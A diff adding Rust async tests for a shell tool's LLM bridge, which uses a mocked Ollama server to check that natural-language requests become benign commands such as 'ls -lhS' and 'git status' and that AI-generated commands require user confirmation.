+#[cfg(feature = "ollama")] +mod ollama_bridge_tests { + use super::*; + use logicshell_llm::ollama::OllamaLlmClient; + use mockito::Matcher; + + fn generate_ok_body(model: &str, response: &str) -> String { + format!(r#"{{"model":"{model}","response":"{response}","done":true}}"#) + } + + #[tokio::test] + async fn bridge_translate_nl_via_ollama_mock() { + let mut server = mockito::Server::new_async().await; + let _mock = server + .mock("POST", "/api/generate") + .with_status(200) + .with_header("content-type", "application/json") + .with_body(generate_ok_body("llama3", "ls -lhS")) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge + .translate_nl("list files sorted by size") + .await + .unwrap(); + assert_eq!(proposed.argv, vec!["ls", "-lhS"]); + assert_eq!(proposed.source, CommandSource::AiGenerated); + } + + #[tokio::test] + async fn bridge_assist_on_127_via_ollama_mock() { + let mut server = mockito::Server::new_async().await; + let _mock = server + .mock("POST", "/api/generate") + .with_status(200) + .with_header("content-type", "application/json") + .with_body(generate_ok_body("llama3", "git status")) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap(); + assert_eq!(proposed.argv, vec!["git", "status"]); + } + + #[tokio::test] + async fn bridge_translate_nl_503_propagates_http_error() { + let mut server = mockito::Server::new_async().await; + let _mock = server + .mock("POST", "/api/generate") + .with_status(503) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge.translate_nl("list files").await; + assert!(matches!(result, Err(LlmError::Http(_)))); + } + + #[tokio::test] + async fn bridge_translate_nl_sends_prompt_in_body() { + let mut server = mockito::Server::new_async().await; + let mock = server + .mock("POST", "/api/generate") + .match_body(Matcher::PartialJsonString( + r#"{"stream":false}"#.to_string(), + )) + .with_status(200) + .with_header("content-type", "application/json") + .with_body(generate_ok_body("llama3", "pwd")) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let _ = bridge.translate_nl("print current directory").await; + mock.assert_async().await; + } + + #[tokio::test] + async fn bridge_full_pipeline_with_safety_eval_ollama() { + let mut server = mockito::Server::new_async().await; + let _mock = server + .mock("POST", "/api/generate") + .with_status(200) + .with_header("content-type", "application/json") + .with_body(generate_ok_body("llama3", "ls -la")) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let proposed = bridge.translate_nl("list files").await.unwrap(); + + let (_, decision) = + proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default()); + assert_eq!( + decision, + Decision::Confirm, + "AI-generated command must require confirmation" + ); + } + + #[tokio::test] + async fn bridge_from_config_with_ollama_client() { + let mut server = mockito::Server::new_async().await; + let _mock = server + .mock("POST", "/api/generate") + .with_status(200) + .with_header("content-type", "application/json") + .with_body(generate_ok_body("llama3", "ps aux")) + .create_async() + .await; + + let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30)); + let cfg = LlmConfig { + enabled: true, + model: Some("llama3".into()), + ..LlmConfig::default() + }; + let bridge = LlmBridge::from_config(client, &cfg).unwrap(); + let proposed = bridge.translate_nl("show running processes").await.unwrap(); + assert_eq!(proposed.argv[0], "ps"); + } + + #[tokio::test] + #[ignore = "requires live Ollama daemon at http://127.0.0.1:11434"] + async fn live_translate_nl_with_real_daemon() { + let client = Arc::new(OllamaLlmClient::new("http://127.0.0.1:11434", "llama3", 60)); + let bridge = LlmBridge::new(client, "llama3", 8_000); + let result = bridge + .translate_nl("list files in the current directory") + .await; + println!("live result: {result:?}"); + // Don't assert on the specific command — model output is non-deterministic. + assert!( + result.is_ok(), + "live translate_nl should not error: {result:?}" + ); + } +}